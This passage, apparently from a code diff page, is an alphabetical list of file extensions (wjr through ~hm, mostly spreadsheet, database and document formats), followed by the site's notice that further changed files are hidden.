|
||||
wjr
|
||||
wk1
|
||||
wk2
|
||||
wk3
|
||||
wk4
|
||||
wk5
|
||||
wke
|
||||
wki
|
||||
wks
|
||||
wku
|
||||
wlmp
|
||||
wmdb
|
||||
wor
|
||||
wpc
|
||||
wpf
|
||||
wpo
|
||||
wq1
|
||||
wq2
|
||||
wtb
|
||||
wtr
|
||||
xbk
|
||||
xdb
|
||||
xdp
|
||||
xds
|
||||
xef
|
||||
xem
|
||||
xfd
|
||||
xfo
|
||||
xft
|
||||
xl
|
||||
xlc
|
||||
xlgc
|
||||
xlr
|
||||
xls
|
||||
xlsb
|
||||
xlsm
|
||||
xlsx
|
||||
xlt
|
||||
xltm
|
||||
xltx
|
||||
xlw
|
||||
xmcd
|
||||
xml
|
||||
xmlper
|
||||
xmpz
|
||||
xpg
|
||||
xpj
|
||||
xpm
|
||||
xpt
|
||||
xrp
|
||||
xsl
|
||||
xslt
|
||||
xsn
|
||||
xtm
|
||||
xtp
|
||||
xxd
|
||||
yam
|
||||
zap
|
||||
zdb
|
||||
zdc
|
||||
zix
|
||||
zmc
|
||||
zpl
|
||||
{pb
|
||||
~hm
|
Some files were not shown because too many files have changed in this diff Show more